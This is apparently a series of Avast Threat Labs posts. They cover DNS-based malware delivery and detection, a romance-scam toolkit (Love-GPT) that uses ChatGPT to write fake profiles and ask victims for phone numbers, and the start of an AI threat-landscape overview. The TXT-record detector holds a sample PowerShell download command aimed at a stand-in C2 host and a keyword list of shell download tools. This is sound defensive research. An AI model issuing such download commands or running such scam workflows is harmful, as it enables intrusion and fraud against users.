
Opening a new front against DNS-based threats

14 December 2023 at 17:25

Domain Name System (DNS) is a hierarchical decentralized naming system for numerous network devices connected to the internet or a private network. Its primary function is to translate user-friendly domain names, such as www.avast.com, into numerical IP addresses that devices use to identify each other on a network.

When a domain name is entered into a web browser, the computer first checks its local cache to see if it already knows the corresponding IP address. If the IP address is not found locally, the computer queries a DNS resolver. This resolver could be run by an Internet Service Provider (ISP) or be a third-party service like Google’s 8.8.8.8. The resolver then checks its own cache. If the IP address is not found there either, a recursive resolver acts as a client itself and walks the hierarchy starting from the root DNS servers.

As with basically any other technology, however, this system can also become a target of malicious actors. Let’s look at how Avast can protect users against various DNS threats, showcasing a few notorious malware families.

How DNS threats work

There are multiple ways in which threat actors can leverage DNS to carry out attacks, and describing all the existing techniques in detail is out of the scope of this text. However, we will provide a brief introduction to the DNS threat landscape so that the reader can imagine how attacks like these work and why threat actors are interested in such vectors.

Rogue/malicious DNS servers are specifically set up by threat actors to intercept and manipulate DNS queries. When a device queries DNS, the rogue DNS server can then respond with incorrect or malicious IP addresses, redirecting legitimate traffic to malicious destinations.

DNS tunneling is a technique where attackers use the DNS protocol to encapsulate non-DNS traffic. This communication can be bidirectional, meaning both requests and responses can carry encapsulated data. It is usually used (but not limited) to exchange malware commands with a Command & Control (C2) server and/or to exfiltrate data from the victims.
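Tunneled traffic has to be smuggled inside query names and answers, which leaves measurable traces in resolver logs: unusually long subdomain labels, high-entropy (encoded) labels, and a preference for record types that carry free-form data. The following is an added example for this post, not Avast’s code, showing how a log monitor can combine these indicators per registered domain; the thresholds, the two-label “registered domain” heuristic (a real deployment would use the Public Suffix List), and the sample query log are all constructed assumptions.

```python
import math
from collections import defaultdict

# Constructed sample of resolver query log entries: (client IP, record type, queried name).
# Example data only; the names are invented for this demonstration.
SAMPLE_QUERIES = [
    ("10.0.0.5", "A", "www.avast.com"),
    ("10.0.0.5", "TXT", "_dmarc.example.com"),
    ("10.0.0.9", "A", "static.cdn.example.net"),
    ("10.0.0.7", "TXT", "q7wz3nfxkb2hjv5tcm4gyd6raeps.cdn-update.example"),
    ("10.0.0.7", "TXT", "m2ykt6bdhw4zjfq3nvg7xcr5pa.cdn-update.example"),
    ("10.0.0.7", "TXT", "e5cxjn3wzbqa7gtk2vhrm6dfy4.cdn-update.example"),
    ("10.0.0.7", "TXT", "t4hbwg2fzmk6jvcp3nrqd7xa5y.cdn-update.example"),
]

# Assumed thresholds; tune them against a baseline of your own traffic.
MIN_SUBDOMAIN_LEN = 25
MIN_ENTROPY = 3.5
TUNNEL_FRIENDLY_TYPES = {"TXT", "NULL"}


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character; encoded payloads score well above hostnames."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str):
    """Return (subdomain part, registered domain).
    Assumption: the registered domain is the last two labels; production code
    should consult the Public Suffix List instead."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def query_indicators(qname: str, qtype: str) -> list:
    """List the tunneling indicators tripped by a single query."""
    sub, _ = split_name(qname)
    payload = sub.replace(".", "")
    reasons = []
    if len(payload) >= MIN_SUBDOMAIN_LEN:
        reasons.append("long subdomain")
    if payload and shannon_entropy(payload) >= MIN_ENTROPY:
        reasons.append("high entropy")
    if qtype.upper() in TUNNEL_FRIENDLY_TYPES:
        reasons.append("tunnel-friendly record type")
    return reasons


def find_tunnel_candidates(queries, min_hits: int = 3) -> dict:
    """Group queries by registered domain and return the domains that have at
    least min_hits distinct names which each trip two or more indicators."""
    hits = defaultdict(set)
    for _client, qtype, qname in queries:
        if len(query_indicators(qname, qtype)) >= 2:
            _, domain = split_name(qname)
            hits[domain].add(qname.lower())
    return {d: sorted(names) for d, names in hits.items() if len(names) >= min_hits}


if __name__ == "__main__":
    for domain, names in find_tunnel_candidates(SAMPLE_QUERIES).items():
        print(f"{domain}: {len(names)} suspicious names, e.g. {names[0]}")
```

Requiring two indicators per query, and several such queries per domain, is what keeps legitimate TXT lookups such as `_dmarc.example.com` out of the result: a single TXT query is normal, a stream of long random-looking labels under one domain is not.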

DNS cache poisoning, also known as DNS spoofing, is a technique where attackers manipulate the DNS cache of a resolver, introducing false mappings between domain names and IP addresses. By injecting false DNS records into the cache, attackers usually redirect users to malicious sites where they are then able to intercept sensitive information. With this ability, they can perform man-in-the-middle (MitM) attacks. This technique can also be particularly dangerous because, once spoofing succeeds, the domains look legitimate to the user (the domain names are the ones the user is used to), yet they lead to a different server with a different IP address.

DNS fast fluxing is based on rapidly and regularly changing the IP addresses for a domain in the DNS records, making it more difficult to track and block the attackers’ infrastructure. Usually, the attackers either have a set of compromised servers/botnet that they can use, or they use a specific approach for changing the IP addresses, behaving similarly to a more traditional domain generation algorithm (DGA).

Why do attackers do it?

The reasons why attackers do this type of attack vary based on their techniques, as well as their intents. However, we can sum up the malicious purposes into these short points:

  • The malware can receive commands and instructions, enabling two-way communication 
  • The threat actor can deploy an additional payload onto the infected device 
  • Information stealers can exfiltrate sensitive data from the infected device 
  • The communication is more obfuscated, rendering it more difficult to track properly 
  • The communication is usually enabled by default, since the traffic operates on a common port 53 
  • The traffic may bypass traditional AVs and gateways due to the possible lack of monitoring and scanning

Threats in the wild

The number of malware families leveraging DNS to carry out malicious activity is increasing. At Avast, we keep up with the current trends and, with our DNS scanning feature, we provide robust protection even against these kinds of attacks.

Let’s peek under the hood of a couple of advanced malware families that leverage DNS for distributing additional payloads and obfuscating the communication with Command & Control (C2) servers.

ViperSoftX

ViperSoftX is a long-standing information stealer. Reaching back at least to 2020, it is mostly bundled with software from unofficial sources and cracks, commonly distributed over torrents. Its wide capabilities, which are to this day intensively developed and improved, range from stealing cryptocurrencies, clipboard swapping, fingerprinting the infected device, and downloading and executing additional payloads, to deploying a malicious browser extension called VenomSoftX.

One of the features the malware authors also implemented is querying the DNS database to retrieve a TXT response from a registered C2 domain. This TXT record contains an execution command to download further malware stages. We can demonstrate this behavior ourselves by using nslookup on the malicious domain. 

DNS TXT record containing a PowerShell command

This command, returned in the form of a DNS TXT response, downloads an additional payload from microsoft-analyse[.]com. The file last.txt contains an obfuscated PowerShell script, carrying further malware stage when executed.

Payload script downloaded from the DNS TXT response script

DarkGate

Also known as MehCrypter and Meh, DarkGate is another advanced information stealer. This stealer, these days weaponized as malware-as-a-service (MaaS), continues to add new features to its operations. 

Alongside features like keylogging, stealing clipboard contents as well as cryptocurrency wallets, and RAT capabilities, DarkGate can also make DNS requests to query DNS TXT responses. 

Currently, one of the distribution methods starts as phishing (e.g., in the form of a PDF), with the document stating it cannot be loaded properly and that the user needs to click on an “Open this document” button. This action downloads a ZIP archive containing a LNK file with the icon of a PDF (Adobe Reader). However, after opening this LNK file, the malware instead executes a command that makes a DNS request and reads the TXT field from the response.

Command executed from a LNK file, performing a DNS query

After the Taste.cmd script is downloaded and executed, a further series of commands is executed, deploying the DarkGate information stealer on the infected machine.

Taste.cmd script (beautified), an intermediary that ensures the execution of DarkGate

DirtyMoe

Since 2016, the notorious DirtyMoe malware has been infecting victims all over the world, focusing the most on Asia and Africa. This multi-modular backdoor is equipped with a variety of functionalities, ranging from exploiting network protocols, cryptojacking, and performing DDoS attacks, to leveraging rootkit capabilities, and much more.

This is further underlined by DirtyMoe’s sophisticated network communication. The malware makes DNS queries using a predefined list of DNS servers and retrieves a list of IP addresses for a single domain from the A record fields. However, these IP addresses, even though syntactically valid, are artificial: they either do not exist or they do not point to the addresses the malware actually wants. The real IP addresses are instead derived from these A records by an additional algorithm. Each of the derived IP addresses is then tried, one of them being the real C2 server.

Finally, the list of the A records also changes rapidly and regularly. This DNS fast fluxing technique further obfuscates the real C2 servers from the fake addresses, making the whole malware communication even more opaque for the defenders. 

In the example below, the malicious server rpc[.]1qw[.]us provides a list of IP addresses (A records). However, these IP addresses are artificial, and they are used for further derivation of the real IP addresses.

DNS records are changed rapidly and regularly
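The fast-flux behavior described above is visible to a defender who resolves a domain repeatedly and watches how much the answer set turns over. The following is an added example for this post (not Avast’s code, and it does not reproduce DirtyMoe’s address-derivation algorithm, which the post does not detail): it replays a constructed resolution log and computes, per domain, the number of distinct addresses, the churn between consecutive lookups, and the minimum TTL. The thresholds, domain names, and addresses (taken from the RFC 5737 documentation ranges) are assumptions made for the demonstration.

```python
from collections import defaultdict

# Constructed resolution log: (unix time, domain, TTL, A-record answers).
# Example data only; addresses are from the documentation ranges and the
# domain names are invented for this demonstration.
SAMPLE_LOG = [
    (1700000000, "rpc.c2-example.test", 60, ["198.51.100.10", "203.0.113.7", "192.0.2.33"]),
    (1700000300, "rpc.c2-example.test", 60, ["198.51.100.44", "203.0.113.120", "192.0.2.33"]),
    (1700000600, "rpc.c2-example.test", 60, ["198.51.100.9", "203.0.113.200", "192.0.2.99"]),
    (1700000900, "rpc.c2-example.test", 60, ["198.51.100.77", "203.0.113.5", "192.0.2.150"]),
    (1700000000, "static.cdn-example.net", 3600, ["192.0.2.1", "192.0.2.2"]),
    (1700003600, "static.cdn-example.net", 3600, ["192.0.2.1", "192.0.2.2"]),
    (1700007200, "static.cdn-example.net", 3600, ["192.0.2.1", "192.0.2.2"]),
    (1700000000, "img.lb-example.net", 300, ["203.0.113.10", "203.0.113.11"]),
    (1700000300, "img.lb-example.net", 300, ["203.0.113.11", "203.0.113.12"]),
    (1700000600, "img.lb-example.net", 300, ["203.0.113.12", "203.0.113.10"]),
    (1700000900, "img.lb-example.net", 300, ["203.0.113.10", "203.0.113.11"]),
]

# Assumed thresholds; tune them against a baseline of your own resolver traffic.
MIN_DISTINCT_IPS = 5
MIN_CHURN = 0.5
MAX_TTL = 300


def profile_domains(log) -> dict:
    """Replay answers per domain in time order and measure how the A-record
    set changes between consecutive lookups."""
    by_domain = defaultdict(list)
    for _ts, domain, ttl, answers in sorted(log, key=lambda row: row[0]):
        by_domain[domain].append((ttl, set(answers)))

    profiles = {}
    for domain, snapshots in by_domain.items():
        seen, previous, churn_sum = set(), None, 0.0
        for ttl, ips in snapshots:
            if previous is not None and ips:
                # fraction of this answer set that was absent from the previous answer
                churn_sum += len(ips - previous) / len(ips)
            previous = ips
            seen |= ips
        steps = max(len(snapshots) - 1, 1)
        profiles[domain] = {
            "observations": len(snapshots),
            "distinct_ips": len(seen),
            "churn": churn_sum / steps,
            "min_ttl": min(ttl for ttl, _ in snapshots),
        }
    return profiles


def fast_flux_candidates(log) -> dict:
    """Domains whose answers are both numerous and short-lived: many distinct
    addresses, a high turnover between lookups, and a low TTL."""
    return {
        domain: profile
        for domain, profile in profile_domains(log).items()
        if profile["distinct_ips"] >= MIN_DISTINCT_IPS
        and profile["churn"] >= MIN_CHURN
        and profile["min_ttl"] <= MAX_TTL
    }


if __name__ == "__main__":
    for domain, profile in fast_flux_candidates(SAMPLE_LOG).items():
        print(domain, profile)
```

The `img.lb-example.net` entries are there as a caveat: a round-robin load balancer also rotates its answers and can use a short TTL, so turnover alone is not enough. Requiring a large number of distinct addresses on top of the churn is what separates it from the flux pattern.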

Crackonosh

Similar to ViperSoftX, Crackonosh is distributed along with illegal, cracked copies of popular software. If the unsuspecting victim installs such cracked software, they inadvertently deploy an XMRig coinminer onto their system, leveraging its resources to profit the attackers. 

Crackonosh contains a lot of advanced techniques, such as disabling antivirus software and Windows Update, as well as performing other anti-detection and anti-forensic actions. 

Additionally, Crackonosh also queries the DNS database as part of its update mechanism. To do so, Crackonosh reads a TXT record from the registered server’s response which contains a string like ajdbficadbbfC@@@FEpHw7Hn33. This string is then parsed and both an IP address as well as a port are derived from it. With this information, Crackonosh downloads a file wksprtcli.dll, containing the malware’s update routine.

Crackonosh decrypting the IP address from a string received in the TXT record
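ViperSoftX, DarkGate, and Crackonosh all pull their next step out of a DNS TXT answer, so the content of TXT responses is worth inspecting on the resolver side. The following is an added example for this post, not Avast’s code: it applies a small set of indicators (command keywords, embedded URLs, decodable base64, and single opaque tokens) to each TXT answer after allowlisting the well-known benign prefixes. The allowlist, keyword list, and sample records are assumptions; the `ajdbficadbbfC@@@FEpHw7Hn33` string is the one quoted in the Crackonosh section above, and the other records are constructed to resemble the behaviors described, not copied from any real response.

```python
import base64
import re

# Assumed allowlist of benign TXT prefixes; extend it with what your own zones publish.
KNOWN_PREFIXES = (
    "v=spf1", "v=dkim1", "v=dmarc1",
    "google-site-verification=", "ms=", "apple-domain-verification=",
)

CMD_KEYWORDS = re.compile(
    r"(?i)\b(powershell|pwsh|cmd(?:\.exe)?|mshta|rundll32|regsvr32|certutil|"
    r"iex|invoke-expression|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b"
)
URL_PATTERN = re.compile(r"(?i)\bhttps?://\S+")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
OPAQUE_TOKEN = re.compile(r"\S{16,}")

# Constructed TXT answers: (owner name, record text). Example data only.
SAMPLE_TXT = [
    ("example.org", "v=spf1 include:_spf.example.org -all"),
    ("_dmarc.example.org", "v=DMARC1; p=reject; rua=mailto:dmarc@example.org"),
    ("update.c2-example.test", "powershell -Command Invoke-WebRequest http://c2-example.test/last.txt"),
    ("cfg.c2-example.test", "ajdbficadbbfC@@@FEpHw7Hn33"),  # string quoted in the post
    ("key.c2-example.test", base64.b64encode(b"constructed sample blob for the example").decode()),
]


def looks_like_base64(token: str) -> bool:
    """True when the token is well-formed base64 (length and alphabet both check out)."""
    if len(token) % 4:
        return False
    try:
        base64.b64decode(token, validate=True)
    except ValueError:
        return False
    return True


def inspect_txt(text: str) -> list:
    """Return the indicators tripped by one TXT record; an empty list means nothing notable."""
    stripped = text.strip()
    if stripped.lower().startswith(KNOWN_PREFIXES):
        return []
    reasons = []
    if CMD_KEYWORDS.search(stripped):
        reasons.append("command keyword")
    if URL_PATTERN.search(stripped):
        reasons.append("url")
    if any(looks_like_base64(tok) for tok in B64_TOKEN.findall(stripped)):
        reasons.append("base64 blob")
    if OPAQUE_TOKEN.fullmatch(stripped):
        reasons.append("opaque token")
    return reasons


def suspicious_txt_records(records) -> dict:
    """Map each owner name whose TXT answer trips at least one indicator to its reasons."""
    flagged = {}
    for name, text in records:
        reasons = inspect_txt(text)
        if reasons:
            flagged[name] = reasons
    return flagged


if __name__ == "__main__":
    for name, reasons in suspicious_txt_records(SAMPLE_TXT).items():
        print(f"{name}: {', '.join(reasons)}")
```

The “opaque token” indicator is deliberately weak on its own: many legitimate domain-verification records are also a single token without a recognisable prefix, so those hits are a triage queue rather than a verdict, while a command keyword or a URL in a TXT answer rarely has an innocent explanation.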

DNS protection in Avast

At Avast, both our free and paid versions protect users against DNS-based threats. This protection, available since version 23.8, includes:

  • Support for detecting C2 callbacks, data exfiltration, and payload delivery through the TXT records 
  • Support for detecting DNS C2 tunneling through the malicious NS servers 
  • Scanner supports scanning of A, AAAA, PTR, NX, TXT DNS records, in both directions

Our paid plan also contains an additional feature, called Real Site, which provides an encrypted connection between your web browser and Avast’s own DNS server to prevent hijacking. In other words, Real Site ensures that the displayed website is the authentic one.

Conclusion

Understanding DNS threats is crucial for defenders. We described how threat actors can leverage DNS to carry out specific attacks. We also provided examples of advanced malware families that use such techniques, distributing additional malware payloads, obfuscating the communication, tunneling their C2 commands through the network, and more. With Avast’s DNS scanning capabilities, we protect our users against these types of threats. 

The post Opening a new front against DNS-based threats appeared first on Avast Threat Labs.

Love-GPT: How “single ladies” looking for your data upped their game with ChatGPT 

4 October 2023 at 13:15

Have you ever wondered, looking at a profile of a potential dream match on a dating platform, who is actually sitting on the opposite side of the screen? Will they look the same when you meet? Did they change something in their bio to make them sound more impressive? Do they like the things they say they do? Or… do they even exist? 

Well, sometimes the answer is: No.  

We have discovered a tool (which is still being developed and improved) that provides vast functionality across several different dating platforms, with the capability to create fake accounts, interact with victims, bypass CAPTCHA, anonymize access using proxies and browser anonymization tools, and more. The author is also experimenting with ChatGPT, the now-famous text-based generative AI, to produce more streamlined and believable texts. Because of that, we decided to name the tool Love-GPT.

Overview

According to our data, the history of the tool goes back at least a decade. Its functionality was iteratively improved over time, adding newer dating platforms as they became more popular, as well as anonymization techniques, and interaction methods. The program contains several Vietnam-related strings, functions, and other references, and we attribute the author to be Vietnamese. 

In this blogpost, we will describe a version from 2023-06-06 (compilation date) with the main module version 347. Note that the tool contains different modules: for example, this main version contains the 544th version of the Account Control Center module.

ChatGPT functionality was likely added to Love-GPT around March 2023 (likely 2023-03-30, main module version 326). 

All versions we’ve seen are programmed explicitly in VB6, provided as a form application. Historically, these variants of module names existed at least at some point in time: 

  • account_control_center_alive_monitor_START_HERE.exe 
  • pof_reload_monitor.exe 
  • ringtones_runas_launch.exe 
  • ringtones_runas_login.exe 
  • scan_phone.exe 
  • virtualbox_pof_reg_CONTROLER_MONITOR.exe 

The tool further requires several additional apps for the whole toolset to function properly. As we will demonstrate, all of these are used to support anonymization of the access to the dating platforms, using proxies, creating a large number of fake accounts, getting and writing emails, and interacting with users. 

We can peek into the main module of Love-GPT below. The module contains several functionalities for interacting with users, including reading inboxes (getting answers and emails), browsing information about matches (the platforms’ way of indicating interest in the other user), sending likes, storing active cookies in a database, changing used proxy, and much more. There are also three different ChatGPT buttons providing a ChatGPT text generation functionality to the interactions.

The main module of Love-GPT

In total, the tool contains 58 different application forms, and it is out of the scope of this blogpost to list and describe all of them. However, we would like to show an additional one below, since it is essential for the whole toolset: the Account Control Center module. 

This module serves as a main hub for creation of fake accounts for all the supported dating platforms. It also supports scraping photos from the platforms, downloading HTML content about any visited page, using PowerTCP to extract cookies, using Multilogin, ProxyRental, Luminati, MountProxy tools for anonymization, and more. The tool also has a (weak) random generator for the new fake accounts’ passwords, and a random selector from a list of 1000 common US names. The built-in browser allows the operator to visually check the tool’s behavior, as well as manually interact on the visited page, when necessary, in case the automation is not enough.

Account Control Center with a built-in browser

Note that the tool we are describing here is huge and we might have missed some important aspects in its functionality or omitted them since they are out of scope for a single blogpost. We are still investigating parts of the program and they might be the subject of a follow-up blogpost(s) in the future.

Fake profiles and data harvesting

Database

As we already mentioned, the main goal of the tool is to create fake profiles on several dating platforms and to store/scrape data from the interactions with the platforms’ users, including their profile pictures, profile body texts, dates of communication, etc. 

In order to be successful in this goal, the tool uses three large databases, called CL Harvest (CL_db_harvest_db), pof_db (as of Plenty of Fish database), and gmail_db, to store a huge variety of information. Since all the databases are intertwined, likely because of historical reasons, we will from now on refer to them as a single database to simplify the analysis. 

The tool uses a Microsoft SQL Server as a database, orchestrating the communication using SQL Server Native Client (provider SQLNCLI10) from inside the program.

Login screen to access the local database with author’s default credentials

Stored information

Currently, the database structure contains approximately 180 different database tables in total (note that the number differs depending on the versions of the tool). We would like to mention at least a few of them, providing interesting insights into what data is being collected or created. We believe none of them need further description.

Table name | Note
a_02_Okcupid_photo_db_scanned_from_okcupid |
a_02_Okcupid_photo_db_scanned_from_okcupid_age_group_1 | Age groups are described later
a_02_okcupid_about_text_db_age_group_3 | Profile “about” description texts
a_03_zoosk_replied_users |
a_07_ashley_accounts |
duyenso_create_fake_profile_current_setting | DuyenSo is a Vietnamese dating platform
email_addresses |
openai_chat_log |
openai_prompt_1st_contact_msg |
openai_prompt_ask_for_number |
openai_prompt_ask_for_number_for_OKCUPID |
openai_prompt_ask_for_number_INDIRECT_WAY |
openai_prompt_chat_template |
openai_prompt_profile_body_text |
pof_accounts_for_scan_new_users |
twilio_for_PVA_direct | PVA stands for “phone verified account”
twilio_phone_for_dating_2018 |
twilio_uk_mobile_number_database |
US_female_firstname_len_5 | “len” stands for “length”
US_male_firstname_len_5 | “len” stands for “length”
Table listing just a few table names from the database

Furthermore, the tool saves images from the dating platforms into several directories: 

  • C:\fb_dating_all_avartar_temp\ (mind the typo) 
  • C:\fb_photo_set_temp\ 
  • C:\PIC for POF\BIG STORE\
  • C:\twoo_scanned_photo\ 
  • E:\FB dating girls photo by city\ 
  • F:\5K Female photos by hair color\ 
  • E:\temp_okcupid_downloaded_photo\ 
  • G:\duyenso_pics_from_pof
  • G:\duyenso_pics_from_pof_girls\ 
  • G:\duyen so acc photo - ready to up - girls\ 
  • G:\duyen so acc photo - ready to up - man\

Age groups

The tool categorizes the users into four different age groups: 

Age group | Age range
 | 30-37 years
 | 37-49 years
 | 49-60 years
No group | None of the above

This serves as a filtering option, and it also shows what ages are interesting for the author/operator. We suppose this is due to the fact that the author is most likely using the stolen information to create further fake accounts. The age group might be an important aspect for setting up the fake age properly, especially with photos. 

Targeted dating platforms

We have identified 13 different dating and social discovery platforms that the tool interacts with, as of the 2023-06-06 analyzed version. The list of the dating platforms can be found below:

Dating platform | Note
Ashley Madison |
Badoo |
Bumble |
Craigslist | Interested in the “Personal” / “cas” section (“casual encounters”)
DuyenSo | Vietnamese dating app
Facebook Dating |
likeyou.vn | Vietnamese social network and dating platform
MeetMe |
OkCupid |
Plenty of Fish |
Tagged |
Tinder |
Zoosk |

The tool has several steps it takes in order to create the fake accounts, following the process of registering on the platforms. This often involves getting through CAPTCHA, verifying phone numbers (PVA), and creation of fake email addresses, usernames, and passwords. All these steps are performed by the tool, seeking the most automatic process possible. If any of the automations fail, the tool also contains a built-in browser that allows the operator to perform the steps manually. 

Note that Craigslist discontinued the “Personal” section following the FOSTA-SESTA acts in 2018, and we consider this functionality obsolete and no longer used in the program.

Historically, Love-GPT was interested in other dating sites/social platforms, too. For example, we could find traces of Twoo, Oodle, and Fetlife. These platforms, however, don’t have proper functionality incorporated in the tool anymore.

Using ChatGPT

During 2023, the author started to use ChatGPT to generate new profile descriptions as well as other prompts to interact with the dating platforms’ users. The author uses a ChatGPT API token which is hardcoded in the binary. 

We estimate that the ChatGPT functionality started to appear around March 2023 (likely 2023-03-30, main module version 326) and it is still under development. Some parts of the functionality still look like proofs of concept that we suppose are not fully functional yet, while others already prove more potent.

The functionality provides an interesting insight into the upcoming trend of using highly believable texts generated by generative AI and large language models (LLMs). We can already see that tools misusing generative AI platforms are emerging, and this is likely one of the first in-the-wild examples of how they can be misused by bad actors.

Overall, the tool contains these functionalities leveraging ChatGPT (both finished and under development): 

  • Create a fake profile description to be used on the dating platforms
  • Read the inbox on the dating platform and reply to messages 
  • Ask for a phone number 
  • Write a first contact message 
  • Chat from a template

In the current implementation, the tool uses these two ChatGPT models: 

  • text-davinci-003 
  • gpt-3.5-turbo

Request parameters

The tool uses different sets of parameters for the performed tasks, steering ChatGPT via its API to behave as needed. For example, the parameters for creating a profile body, which favor diverse and short texts, are as follows:

  • "temperature": "1"
  • "max_tokens": "60"
  • "top_p": "1"
  • "frequency_penalty": "0.5"
  • "presence_penalty": "0"

Note that for other prompts, temperature = 0.5 is usually used as well, scaling down the randomness. 

The tool uses “prompt” values in the API requests’ body to generate the output. In some of the cases, the whole context is provided to guide ChatGPT for the more precise results:

Just for the sake of demonstration, this is what ChatGPT usually returns for similar prompts:

The detailed description of the parameters available in the ChatGPT API can be found in the official documentation

The tools to win

Love-GPT uses a large set of additional tools and components to stay hidden/anonymize its interaction with the dating sites and their users. It also contains additional components for it to operate, using communication tools and protocols, Android emulator, and OCR for CAPTCHA bypass.

Staying anonymous

The tool needs to use real-looking, fake request fingerprints to reliably access the dating platforms. Otherwise, the platforms could detect such activity and suspend/ban the accounts or bombard the access with CAPTCHAs and other anti-crawler safeguards. 

Below, you can find a list of the anonymization tools being used, with a short description. 

Tool | Short description
AdsPower | Anti-fingerprinting tool using virtual browser profiles
FraudFox | Virtual machine and a tool for user-agent and device spoofing
Identory | Anti-fingerprinting browser platform, creating unique identities for any site
Kameleo | Anti-fingerprinting browser platform using virtual browser profiles
Luminati | Proxy network, allowing anonymity for data collection and web scraping
MountProxy | Residential proxy provider
Multilogin | Anti-fingerprinting tool using virtual browser profiles
ProxyRental | Residential proxy and dynamic IP provider

To summarize, with this artillery, Love-GPT stays under the radar because no one can effectively distinguish connections coming from this specific tool and other regular users accessing the platforms. 

Communication components

Love-GPT can communicate with users directly on the dating platforms. Because the platforms usually need to verify their users using unique email addresses, or even require PVA accounts (phone verified accounts), the tool has complete email and phone number management. To achieve this goal, it uses these services and tools:

  • Email services – Gmail, Yahoo 
  • PowerTCP
  • Pinger 
  • SMSpva (smspva.com)
  • TextFree 
  • TextNow 
  • Tropo
  • Twilio

SMSpva is a service for obtaining temporary phone numbers. Along with TextFree, TextNow, Twilio, and others, it gives the toolset a convenient way to receive the SMS verification codes needed for PVA registration.

The tool is also able to analyze and send emails from the created Gmail or Yahoo accounts’ inboxes, as well as forwarding emails to different addresses. 

Finally, Love-GPT also uses PowerTCP, or more specifically DartWeb.dll, to support network and communication-related traffic with the web.

Buying new domains

Love-GPT also has a system for buying new domains and making renewals of the already registered domains, including performing payments for the domains. Historically, this was being performed using Entropay. However, since Entropay’s consumer product was discontinued in 2019, we suppose the Love-GPT’s operator switched to some other similar consumer-based service, but that is not reflected in the code – virtual credit card information is stored on the author’s local database, not in the binary. 

The main purpose for this functionality is to set a domain forwarding through the registered domains. To achieve this, the tool uses an API to check the required domains availability, checking the auto-renewal options, as well as setting up the forwarding: 
https://api.name.com/v4/domains/ 

Android emulation

Since some of the platforms are mobile based, for example DuyenSo or the Facebook dating app, the tool uses LDPlayer to emulate a proper behavior on the supported dating platforms. 

The tool also uses a shared folder for exchanging files between the emulator and the local filesystem, mostly for transferring photos: 

  • E:\LDplayer_shared_folder_for_fbdating\

OCR and CAPTCHA

Quite an effort was made in Love-GPT to bypass CAPTCHAs. It uses two different Optical Character Recognition (OCR) tools for capturing texts:

  • OmniPage 
  • DeCaptcher 

Love-GPT has a dedicated panel, a control center, to orchestrate the CAPTCHA bypassing functionality. 

CAPTCHA Control Center

Future work

During our research, we have discovered multiple additional tools with similar purposes, some of them even likely from the same author who is behind Love-GPT. These vary from more broad scrapers to highly specialized, for example just focusing on Tinder. This clearly shows the trend of automation in this field and ChatGPT can be useful in streamlining the interactions to harvest further data from the victims than they would share otherwise. 

Hashes

Hash | Compilation date
8071dc3dc1e7814f644f2745bbebab8c159763a3605b3615847772851b3960ce | 2023-06-06
cf809afcad7a2054a8c39a84443579d0c9d81ddf0233164bf2a4214a39b6206c | 2023-03-30


Insights into the AI-based cyber threat landscape

5 September 2023 at 13:38

Executive summary

Both large language models (LLMs) and generative AI are undergoing a significant increase in their abilities and global utilization. While these tools offer undeniable utility to the general public, they also present potential risks of misuse. Furthermore, bad actors are also actively investigating tools like OpenAI’s ChatGPT. 

This document describes following aspects of an AI-based cyber threat landscape: 

  • How ChatGPT brand is misused for lures, scams, or other social engineering related threats 
  • How generative AI can be used to generate malware 
  • The potential pitfalls and changes it brings for security researchers and attackers 
  • How ChatGPT and generative AI can help security researchers in their daily struggles, providing insights, and bringing AI-based assistants to their toolset 

Generative AI and other forms of AI are going to play a key role in the cyber threat landscape. We expect that highly believable and multilingual texts misused for phishing and scams will be leveraged at scale, providing better opportunities for more advanced social engineering. 

On the other hand, we believe that generative AI as it stands now is unlikely to drastically alter the landscape of malware generation. Although many proofs of concept exist—mainly from security firms and nefarious actors testing the technology—it’s still a complex approach, especially when compared to existing, simpler methods. 

Despite the risks, it is important to recognize the value that generative AI brings to the table when used for legitimate purposes. We already see security and AI-based assistant tools with various levels of maturity and specialization emerging on the market.  

Given the rapid development of these tools and the widespread availability of open-source versions, we can reasonably anticipate a substantial improvement in their capabilities in the near future. 

This post can be also downloaded as a PDF here.

AI-generated lures and scams  

AI-generated lures and scams are having a moment. In the world of cybercriminals, AI now serves as the perfect use case for creating lures and carrying out phishing attempts and scams on victims. This is due to the fact that AI serves as a helping hand in writing various forms of texts–emails, social media content, e-shop reviews, SMS scams, and more. In general, AI also improves the credibility of social scams by providing trustworthy, authentic texts that eliminate the traditional phishing red flags, such as broken language and weird addressing. To our surprise, when we asked ChatGPT to make a lottery scam email more believable, it reduced the amount won, which can make the email slightly more believable.  

These threats, increasingly sophisticated and persistent, have begun to exploit advanced technologies, creating a new battlefield in the world of AI systems. In recent years, we’ve witnessed a number of societal issues and initiatives abused in a similar fashion—including (but not limited to) cryptocurrencies, Covid-19, and the war in Ukraine.

In the case of ChatGPT, its popularity with hackers has less to do with their interest in AI than it does with the fact that ChatGPT has now become a household name. With the amount of attention ChatGPT receives these days, it would be surprising if attackers didn’t investigate how it can be used for their purposes. 

How is generative AI supporting the creation of lures and scams?

When examining the ChatGPT scams created by cybercriminals, it’s important to observe the language used in scams and how AI can support malware authors in creating more advanced texts than they’d otherwise be capable of writing. AI can easily improve grammatical mistakes, provide content in multiple languages, and create multiple variations of texts to improve their believability. 

ChatGPT can currently provide robust, well-written texts, but if an attacker wants to perform a sophisticated phishing attack, they’d need to insert the text into proper templates. This is because phishing attempts must appear to be credible and consist of more than just text. The attackers can choose from a plethora of existing phishing kits for sale where they obtain already functional and well-designed phishing webpages or emails. They can also use web archiving tools to create a copy of the web and change the appropriate URLs to phish the victims.  

For now, it’s necessary for attackers to build some aspects of their attempts manually and ChatGPT is not currently the ultimate “out of the box” solution for creating advanced malware. Users simply can’t ask for a copy of a website along with a code and styles to run it. That being said, we expect that multi-type models, allowing the combination of multiple LLM outputs, including images, audio, and video, will emerge in the near future. Furthermore, we can already see projects like LlamaIndex incorporating multiple sources of data, enhancing the capabilities even further. With that, we expect that multi-type LLMs will be able to create highly believable custom phishing and scam campaigns targeting a specific audience, including special offers, package deliveries, investment opportunities, scams during big events, and more. 

Malvertising

Malvertising—a portmanteau of “malicious advertising”—is a cybercrime tactic where malware is disseminated through online advertising. This technique cleverly exploits the extensive reach and interactive nature of digital ads to distribute harmful content. 

